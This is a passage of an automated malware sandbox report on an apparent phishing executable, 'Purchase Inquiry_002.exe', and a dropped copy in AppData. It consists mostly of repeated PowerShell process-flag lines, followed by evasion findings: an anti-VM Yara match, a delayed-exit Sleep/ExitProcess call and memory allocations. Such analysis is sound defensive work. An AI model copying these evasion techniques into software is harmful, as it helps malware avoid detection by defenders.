            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: Purchase Inquiry_002.exe PID: 7180, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xASiLfzXONGIW.exe PID: 1412, type: MEMORYSTR
            Delayed program exit found
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0040E18D Sleep,ExitProcess,14_2_0040E18D
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeMemory allocated: 27A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeMemory allocated: 2830000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeMemory allocated: 4830000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeMemory allocated: 8B80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeMemory allocated: 9B80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeMemory allocated: 9D90000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeMemory allocated: AD90000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeMemory allocated: 13E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeMemory allocated: 2E30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeMemory allocated: 1460000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeMemory allocated: 8AD0000 memory reserve | memory write watchJump to behavior
